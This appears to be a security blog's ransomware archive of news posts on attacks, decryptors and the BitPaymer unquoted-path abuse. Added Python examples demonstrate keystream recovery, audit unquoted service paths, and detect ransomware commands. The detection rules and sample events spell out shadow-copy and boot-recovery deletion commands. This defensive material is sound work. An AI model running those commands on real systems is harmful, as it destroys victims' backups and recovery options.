Category Archives: ransomware

Malspam Campaign Targeted German Organizations with Buran Ransomware

Researchers spotted a malspam campaign that targeted German organizations with samples of the Buran crypto-ransomware family. In early October, Bromium observed a malspam campaign whose emails impersonated online fax service eFax. The emails contained hyperlinks to a PHP page that served up malicious Word documents. This technique helped the Word documents evade detection, as they […]

The post Malspam Campaign Targeted German Organizations with Buran Ransomware appeared first on The State of Security.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft has released a free decryption tool for the STOP (Djvu) ransomware; in recent months its research team has helped the victims of many other ransomware families as well.

STOP (Djvu) ransomware has 160 known variants that have infected hundreds of thousands of victims worldwide. Experts estimate a total of 460,000 victims, which makes this threat the most active and widespread ransomware today.

According to data in Emsisoft's Ransomware Statistics report for Q2 and Q3 2019, Djvu accounts for more than half of all ransomware submissions worldwide.

According to Emsisoft, this is the first time a decryptor has recovered ransomware-encrypted files on this scale via a side-channel attack on the ransomware's keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Djvu ransomware encrypts the victim's files with the Salsa20 stream cipher and appends one of dozens of extensions to the filenames, such as “.djvu”, “.rumba”, “.radman” and “.gero”.
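The article does not describe how Emsisoft's side-channel attack on the keystream works, so what follows is neither the decryptor's method nor Emsisoft's code. It is an added example of why the keystream of a stream cipher such as Salsa20 is the thing to go after: a stream cipher only XORs the plaintext with the keystream, so whenever one encrypted file is still available in its original form (or the same key and nonce were reused across files), plaintext XOR ciphertext yields the keystream, and that keystream strips the encryption from any other file encrypted under the same key and nonce. The Salsa20 implementation is written out in full; the key, nonce and file contents are constructed for the demo, and the assumption that the sample "ransomware" reuses one key/nonce pair for every file is the demo's own, not a claim about STOP/Djvu.

```python
import struct

MASK = 0xFFFFFFFF
SIGMA = b"expand 32-byte k"  # Salsa20 constant for 256-bit keys


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _quarterround(s, a, b, c, d):
    s[b] ^= _rotl((s[a] + s[d]) & MASK, 7)
    s[c] ^= _rotl((s[b] + s[a]) & MASK, 9)
    s[d] ^= _rotl((s[c] + s[b]) & MASK, 13)
    s[a] ^= _rotl((s[d] + s[c]) & MASK, 18)


def salsa20_block(key, nonce, counter):
    """One 64-byte Salsa20/20 keystream block (256-bit key, 64-bit nonce, 64-bit block counter)."""
    if len(key) != 32 or len(nonce) != 8:
        raise ValueError("need a 32-byte key and an 8-byte nonce")
    c = struct.unpack("<4I", SIGMA)
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    ctr = (counter & MASK, (counter >> 32) & MASK)
    init = [c[0], k[0], k[1], k[2], k[3],
            c[1], n[0], n[1], ctr[0], ctr[1],
            c[2], k[4], k[5], k[6], k[7], c[3]]
    x = list(init)
    for _ in range(10):                      # 10 double rounds = 20 rounds
        _quarterround(x, 0, 4, 8, 12)        # column round
        _quarterround(x, 5, 9, 13, 1)
        _quarterround(x, 10, 14, 2, 6)
        _quarterround(x, 15, 3, 7, 11)
        _quarterround(x, 0, 1, 2, 3)         # row round
        _quarterround(x, 5, 6, 7, 4)
        _quarterround(x, 10, 11, 8, 9)
        _quarterround(x, 15, 12, 13, 14)
    return struct.pack("<16I", *[(x[i] + init[i]) & MASK for i in range(16)])


def keystream(key, nonce, length):
    """Concatenate keystream blocks until `length` bytes are available."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += salsa20_block(key, nonce, block)
        block += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def salsa20_xor(key, nonce, data):
    """Encrypt or decrypt (same operation): data XOR keystream."""
    return xor_bytes(data, keystream(key, nonce, len(data)))


def recover_keystream(plaintext, ciphertext):
    """Known-plaintext step: P XOR C = keystream, for as many bytes as both are available."""
    return xor_bytes(plaintext, ciphertext)


def strip_keystream(ks, ciphertext):
    """Remove a recovered keystream from another file encrypted under the same key and nonce.
    Only the first len(ks) bytes can be recovered; the rest stays encrypted."""
    n = min(len(ks), len(ciphertext))
    return xor_bytes(ciphertext[:n], ks[:n])


# Constructed demo data (not from any real sample). The "ransomware" here reuses one
# key/nonce pair for every file, which is the assumption that makes the recovery work.
DEMO_KEY = bytes(range(32))
DEMO_NONCE = b"\x00" * 8
KNOWN_PLAIN = b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
SECRET_PLAIN = b"payroll export Q3: do not distribute outside the finance team\n"


def demo():
    """Encrypt two files, recover the keystream from the one we still have a copy of,
    and use it to decrypt the other. Returns the recovered prefix of SECRET_PLAIN."""
    c_known = salsa20_xor(DEMO_KEY, DEMO_NONCE, KNOWN_PLAIN)
    c_secret = salsa20_xor(DEMO_KEY, DEMO_NONCE, SECRET_PLAIN)
    ks = recover_keystream(KNOWN_PLAIN, c_known)
    return strip_keystream(ks, c_secret)


if __name__ == "__main__":
    print(demo())
```

Only as many bytes as the known file is long can be recovered; the demo deliberately makes the secret file longer than the known one so the partial result is visible. The same property is why a stream cipher must never reuse a nonce under one key, and why file-pair based decryptors ask victims for an encrypted file together with its original.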

The price of the private key and decryption software is $980; victims get a 50% discount if they contact the crooks within the first 72 hours.

Djvu is mainly delivered through key generators and software cracks; experts also point out that some STOP versions bundle additional malicious payloads, including password stealers.

The Emsisoft decryptor can recover, for free, files encrypted by 148 of the 160 variants, which means approximately 70% of victims should be able to get their data back. Files encrypted by the remaining 12 variants currently cannot be decrypted.

Key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company has now published an update on the attack, confirming that the root cause of the service disruption was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack; the company confirmed that, immediately after the attack, the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company says it has now restored many of the impacted systems.

Ryuk has been involved in a long string of attacks on cities, hospitals and organizations worldwide.

In September, the city of New Bedford was infected with Ryuk but refused to pay the $5.3M ransom. In April, systems in the city of Stuart were infected by the same ransomware, and in early March Jackson County, Georgia was hit by Ryuk as well; the attack paralyzed government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems of the M6 Group, France's largest private multimedia group, were infected with ransomware over the weekend; fortunately, none of the company's TV and radio channels had their broadcasts interrupted.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “All the office and management tools are disrupted.”

The company revealed the incident took place on Saturday.

The M6 Group's cybersecurity staff was able to mitigate the threat immediately, preventing any downtime of its TV channels, radio stations and film studios.

“The M6 Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cybersecurity experts has made it possible to ensure the continuity of broadcasting of the programs on all our TV and radio channels,” reads the message posted through the group's Twitter account.

In April, another broadcaster suffered a similar incident: a cyber attack hit The Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, TV5Monde was hit by a severe cyber attack that disrupted broadcasting across its channels. The attackers also hijacked the TV5Monde website and the French broadcaster's social media accounts.

Yves Bigot, at the time the director-general of TV5Monde, told the BBC that the cyber attack came close to destroying the French TV network; the investigation pointed to the Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses.

SMBs are a prime target

While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs …

The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

The Evolution of Phishing: The Spear Is Aimed at You

You can’t go a week without seeing a story about a data breach or ransomware hitting organizations. These breaches can be very costly, but they still continue to show up. Are the good guys not winning the cybersecurity war? Organizations invest millions of dollars in security products and services, but they keep getting breached. We […]

The post The Evolution of Phishing: The Spear Is Aimed at You appeared first on The State of Security.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

Pitney Bowes announced that a ransomware attack infected its systems and caused a partial system outage that made some of its services unavailable to some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

The good news is that there is no evidence that the attackers accessed company information. The company has hired an external security firm to support its investigation into the breach.

The mailing system products were paralyzed by the attack; the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even though customers will not be able to refill their postage meters until the systems are restored, they will still be able to print postage if their meters have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment and some of the Support pages, and Software and Data Marketplace downloads are unavailable.

For Commerce Services clients, the impacted solutions include Fulfillment, Delivery and Returns, and Presort services.

The Software and Data products are not affected by the ransomware attack because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced that it has restored normal operations after paying the ransom demanded by the crooks who infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted to pay the ransom and has announced that normal operations have been restored.

The hospital chain has not revealed the amount it paid to decrypt the data; it appears the cost was covered by insurance.

I recently reported that several hospitals and health service providers in the U.S. and Australia were hit by ransomware attacks that forced administrators to shut down part of their IT infrastructure. At the time, a joint press release from the affected hospitals, DCH Regional Medical Center, Northport Medical Center and Fayette Medical Center in the west Alabama cities of Tuscaloosa, Northport and Fayette, revealed that they had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

Operations at the hospitals were severely impacted for 10 days, during which the hospitals kept treating existing patients but sent new patients to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The hospitals' systems were infected with a variant of the Ryuk ransomware; staff reverted to using paper records.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Several US cities have recently suffered ransomware attacks; in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims, including Key Biscayne, Riviera Beach and Lake City. In June, Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom but was not able to completely recover its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either; LabCorp and Hancock Health are only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

15 Easy, Effective Ways to Start Winning Back Your Online Privacy

Someone recently asked me what I wanted for Christmas this year, and I had to think about it for a few minutes. I certainly don’t need any more stuff. However, if I could name one gift that would make me absolutely giddy, it would be getting a chunk of my privacy back.

Like most people, the internet knows way too much about me — my age, address, phone numbers and job titles for the past 10 years, my home value, the names and ages of family members  — and I’d like to change that.

But there’s a catch: Like most people, I can’t go off the digital grid altogether because my professional life requires me to maintain an online presence. So, the more critical question is this:

How private do I want to be online?  

The answer to that question will differ for everyone. However, as the privacy conversation continues to escalate, consider a family huddle. Google each family member’s name, review search results, and decide on your comfort level with what you see. To start putting new habits in place, consider these 15 tips.

15 ways to rein in your family’s privacy

  1. Limit public sharing. Don’t share more information than necessary on any online platform, including private texts and messages. Hackers and cyber thieves mine for data around the clock.
  2. Control your digital footprint. Limit information online by a) setting social media profiles to private, b) regularly editing friends lists, c) deleting personal information on social profiles, d) limiting app permissions and browser extensions, and e) being careful not to overshare.
  3. Search incognito. Use your browser in private or incognito mode to reduce some tracking and auto-filling.
  4. Use secure messaging apps. While WhatsApp has plenty of safety risks for minors, in terms of data privacy it’s a winner because it includes end-to-end encryption that prevents anyone in the middle from reading private communications. Keep in mind that end-to-end encryption protects the content of messages, not the metadata of who you talk to and when.
  5. Install an ad blocker. If you don’t like the idea of third parties following you around online, and peppering your feed with personalized ads, consider installing an ad blocker.
  6. Remove yourself from data broker sites. Dozens of companies can harvest your personal information from public records online, compile it, and sell it. To delete your name and data from companies such as PeopleFinder, Spokeo, White Pages, or MyLife, make a formal request to the company (or find the opt-out button on their sites) and followup to make sure it was deleted. If you still aren’t happy with the amount of personal data online, you can also use a fee-based service such as DeleteMe.com.
  7. Be wise to scams. Don’t open strange emails, click random downloads, connect with strangers online, or send money to unverified individuals or organizations.
  8. Use bulletproof passwords. When it comes to data protection, the strength of your passwords matters: use a long, unique password for every account and a password manager to keep track of them.
  9. Turn off devices. When you’re finished using your laptop, smartphone or IoT devices, turn them off to protect against rogue attacks.
  10. Safeguard your SSN. Just because a form (doctor, college and job applications, ticket purchases) asks for your Social Security Number (SSN) doesn’t mean you have to provide it.
  11. Avoid public Wi-Fi. Public networks are targets for hackers who are hoping to intercept personal information; opt for the security of a family VPN.
  12. Purge old, unused apps and data. To strengthen security, regularly delete old data, photos, apps, emails, and unused accounts.
  13. Protect all devices. Make sure all your devices are protected against viruses and malware with reputable security software.
  14. Review bank statements. Check bank statements often for fraudulent purchases and pay special attention to small transactions.
  15. Turn off Bluetooth. Bluetooth technology is convenient, but outside sources can compromise it, so turn it off when it’s not in use.

Is it possible to keep ourselves and our children off the digital grid and lock down our digital privacy 100%? Sadly, probably not. But one thing is for sure: We can all do better by taking specific steps to build new digital habits every day.

~~~

Be Part of Something Big

October is National Cybersecurity Awareness Month (NCSAM). Become part of the effort to make sure that our online lives are as safe and secure as possible. Use the hashtags #CyberAware, #BeCyberSafe, and #NCSAM to track the conversation in real-time.

The post 15 Easy, Effective Ways to Start Winning Back Your Online Privacy appeared first on McAfee Blogs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty ransomware: security researchers have released a free decryptor tool that can be used to recover files.

The Nemty ransomware appeared in the threat landscape in mid-August; its name comes from the extension it adds to encrypted file names. The malicious code also deletes the volume shadow copies to make any recovery from them impossible.
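Shadow-copy deletion is one of the few ransomware actions that is loud in process-creation telemetry, so it is worth a detection rule. The following is an added example (not a Nemty analysis and not a vendor rule): a small rule set over command lines from constructed process-creation events, loosely shaped like Sysmon Event ID 1 records, that flags the usual shadow-copy and boot-recovery tampering commands, raises the severity when the parent process runs from a user-writable directory, and downgrades hits from an allowlisted backup agent instead of dropping them. The hostnames, paths, allowlist and events are made up for the demo.

```python
import re

# Constructed process-creation events (field names loosely follow Sysmon Event ID 1; not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "ws07", "user": "CORP\\svc_backup", "parent": r"C:\Program Files\BackupAgent\agent.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
    {"host": "ws07", "user": "CORP\\jdoe", "parent": r"C:\Users\jdoe\AppData\Local\Temp\setup.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "ws07", "user": "CORP\\jdoe", "parent": r"C:\Users\jdoe\AppData\Local\Temp\setup.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe", "cmdline": "wmic shadowcopy delete"},
    {"host": "ws07", "user": "CORP\\jdoe", "parent": r"C:\Users\jdoe\AppData\Local\Temp\setup.exe",
     "image": r"C:\Windows\System32\bcdedit.exe", "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"host": "srv02", "user": "CORP\\svc_backup", "parent": r"C:\Program Files\BackupAgent\agent.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin delete shadows /for=D: /oldest"},
]

# (rule id, case-insensitive regex over the command line, base severity)
RULES = [
    ("vssadmin_delete_shadows", r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", "high"),
    ("vssadmin_resize_shadowstorage", r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b", "medium"),
    ("wmic_shadowcopy_delete", r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", "high"),
    ("wbadmin_delete_catalog", r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", "high"),
    ("bcdedit_disable_recovery",
     r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", "medium"),
    ("wmi_shadowcopy_delete_powershell",
     r"win32_shadowcopy\b.*\b(delete\(\)|remove-wmiobject|remove-ciminstance)", "high"),
]

LEVELS = ["low", "medium", "high", "critical"]

# A parent running from a user-writable location is a strong ransomware signal; a backup agent
# calling vssadmin is normal and gets downgraded rather than dropped, so the audit trail survives.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp)\\", re.IGNORECASE)
ALLOWLISTED_PARENTS = {r"c:\program files\backupagent\agent.exe"}  # constructed allowlist


def _bump(severity):
    return LEVELS[min(LEVELS.index(severity) + 1, len(LEVELS) - 1)]


def detect(events, rules=RULES, allowlist=ALLOWLISTED_PARENTS):
    """Return one finding per (event, matching rule), with severity adjusted by parent context."""
    compiled = [(rid, re.compile(pat, re.IGNORECASE), sev) for rid, pat, sev in rules]
    findings = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        parent = ev.get("parent", "")
        for rid, rx, base in compiled:
            if not rx.search(cmd):
                continue
            from_user_writable = bool(USER_WRITABLE.search(parent))
            if parent.lower() in allowlist:
                severity = "low"
            elif from_user_writable:
                severity = _bump(base)
            else:
                severity = base
            findings.append({
                "rule": rid, "severity": severity, "host": ev.get("host"), "user": ev.get("user"),
                "parent": parent, "cmdline": cmd, "suspicious_parent": from_user_writable,
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print("%-8s %-32s %s <- %s" % (f["severity"], f["rule"], f["host"], f["parent"]))
```

The rules match on the command line rather than the image path because the same binaries are reachable through cmd.exe, PowerShell and WMI wrappers; the allowlist keeps legitimate backup software from paging anyone while still recording the event for later investigation.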

Below is the ransom note dropped by Nemty after the encryption process completes. The attackers demand a 0.09981 BTC ransom (roughly $1,000), paid through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware; according to the popular malware researcher Vitali Kremez, it is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor that works on Nemty versions 1.4 and 1.6, and they have also announced a working tool for version 1.5.

The security firm is also working with Europol to get its decryptors included in the NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions; the researchers are working to improve it and support other file types.

Tesorion does not let victims generate the decryption keys locally with the client; instead, the key is generated on Tesorion's own servers and handed back to the victim.

Victims can contact the Tesorion CSIRT and request help with the Nemty ransomware; the company will then send a link to the decryptor that allows them to decrypt their files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims upload their files to Tesorion's servers, which use them to calculate the decryption key; the key is then sent back to the victims, who load it into the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind the BitPaymer ransomware attacks has been found exploiting a Windows zero-day in Apple's iTunes and iCloud.

The cybercriminals behind the BitPaymer and iEncrypt ransomware attacks have been found exploiting, in attacks in the wild, a zero-day vulnerability in the Windows versions of Apple's iTunes and iCloud.

The zero-day resides in the Bonjour updater that comes packaged with Apple's iTunes and iCloud software for Windows; the attackers abused it to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically downloading updates for Apple software. The experts pointed out that the Bonjour updater has its own entry in the installed software list and its own scheduled task to execute the process, which means that uninstalling iTunes and iCloud does not remove it.

The experts discovered that the Bonjour updater was affected by an unquoted service path vulnerability.

An unquoted search path is a long-known class of bug: when the path to a service or program executable (commonly an uninstaller) is not quoted and contains spaces, Windows resolves it by trying each space-delimited prefix in turn. An attacker who can write to one of those prefix locations (for example C:\Program) can plant an executable that runs instead of the intended binary.

Bonjour was trying to run from the Program Files folder, but because of the unquoted path it instead ran the BitPaymer ransomware, which had been named “Program”.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”
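As an added example (not Morphisec's tooling and not Apple's code), the following audit reproduces the unquoted-path logic described above: it extracts the executable from a service command line, flags it when it is unquoted and contains spaces, lists the prefix locations where an attacker could plant a binary (bare and with .exe appended, since the Morphisec case used an extensionless file named Program) and produces the quoted form that fixes it. The sample ImagePath values are constructed; mDNSResponder.exe is the Bonjour service binary, but the directory shown for it is assumed, and the other service names and paths are made up.

```python
import re

_EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def executable_part(command):
    """Return (executable, was_quoted) for a service/task command line.
    Quoted: the text between the first pair of double quotes. Unquoted: everything up to the
    first '.exe' (the usual audit heuristic; a path without '.exe' is taken whole)."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return (cmd[1:end] if end > 0 else cmd[1:]), True
    m = _EXE_RE.search(cmd)
    return (cmd[:m.end()] if m else cmd), False


def hijack_candidates(exe_path):
    """Locations the loader may try before the intended binary when exe_path is unquoted:
    each space-delimited prefix, bare and with .exe appended. Which form is tried depends on
    how the path is launched (SCM, Task Scheduler, CreateProcess), so both are reported."""
    parts = exe_path.split(" ")
    out = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        out.append(prefix)
        out.append(prefix + ".exe")
    return out


def quote_path(command):
    """The fix: wrap the executable in double quotes and keep any arguments unchanged."""
    exe, quoted = executable_part(command)
    if quoted:
        return command.strip()
    rest = command.strip()[len(exe):]
    return '"%s"%s' % (exe, rest)


def audit(services):
    """services: iterable of (name, image_path). Returns findings for unquoted paths with spaces."""
    findings = []
    for name, image_path in services:
        exe, quoted = executable_part(image_path)
        if quoted or " " not in exe:
            continue
        findings.append({"service": name, "executable": exe,
                         "plant_here": hijack_candidates(exe), "fixed": quote_path(image_path)})
    return findings


# Constructed sample of service ImagePath values (illustrative, not dumped from a real host).
SAMPLE_SERVICES = [
    ("Bonjour Service", r"C:\Program Files\Bonjour\mDNSResponder.exe"),
    ("EventLog", r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted"),
    ("Spooler", r'"C:\Windows\System32\spoolsv.exe"'),
    ("VendorAgent", r"C:\Program Files\Some Vendor\Agent Service\agent.exe --service"),
    ("QuotedVendor", r'"C:\Program Files\Some Vendor\Agent Service\agent.exe" --service'),
]


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f["service"])
        print("  executable :", f["executable"])
        print("  plant here :", ", ".join(f["plant_here"]))
        print("  fixed      :", f["fixed"])
```

On a real host the inputs would come from the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services, from `sc qc <service>`, or from the Actions of scheduled tasks, which is where the Bonjour updater lives. Quoting the path removes the ambiguity; the complementary mitigation is to make sure the candidate plant directories (the volume root and Program Files) are not writable by unprivileged users, and that a file with no extension dropped there still gets scanned.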

bitpaymer campaign

The experts explained that attackers who abuse a legitimate process signed by a trusted vendor, like Bonjour, can launch a new malicious child process while evading detection. In this specific attack, security products did not scan the malicious payload because it had no file extension.

Unquoted service path vulnerabilities can also be exploited by attackers to escalate privileges.

Morphisec Labs reported the discovery to Apple, which released iCloud for Windows 10.7, iCloud for Windows 7.14 and iTunes 12.10.1 for Windows to address the vulnerability.

Users who installed Apple software on their Windows computer and later uninstalled it should manually uninstall the Bonjour updater if it is still present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

Cybercrime is maturing, shifting its focus to larger and more profitable targets

Cybercrime is continuing to mature and is becoming bolder, shifting its focus to larger and more profitable targets as well as new technologies. Data is the key element in cybercrime, both from a criminal and an investigative perspective. These key threats demonstrate the complexity of countering cybercrime and highlight that criminals only innovate their criminal behavior when existing modi operandi have become unsuccessful or more profitable opportunities emerge. In essence, new threats do …

The post Cybercrime is maturing, shifting its focus to larger and more profitable targets appeared first on Help Net Security.

Ransomware victim hacks attacker, turning the tables by stealing decryption keys

Normally it works like this. Someone gets infected by ransomware, and then they pay the ransom. The victim then licks their wounds and hopefully learns something from the experience. And that’s what happened to Tobias Frömel, a German developer and web designer who found himself paying a Bitcoin ransom of 670 Euros (US $735) after […]

The post Ransomware victim hacks attacker, turning the tables by stealing decryption keys appeared first on The State of Security.

Developer hacked back Muhstik ransomware crew and released keys

One of the victims of the Muhstik ransomware gang, who had initially paid the ransom, decided to hack back the crooks and released their decryption keys.

Tobias Frömel is a German software developer who fell victim to the Muhstik ransomware. Frömel initially paid the ransom to decrypt his files, but later decided to get his revenge on the crooks.

He hacked the server used by the Muhstik gang and released the decryption keys for all of the group's victims.

Muhstik is a piece of ransomware first detected in the wild in late September while targeting QNAP network-attached storage (NAS) devices.

The attackers first gain access to the NAS devices through brute-force attacks on the built-in phpMyAdmin service, then encrypt their contents and append the “.muhstik” extension to the filenames.

The gang targets NAS devices made by the Taiwanese hardware vendor QNAP, brute-forcing devices that use weak passwords for the built-in phpMyAdmin service.

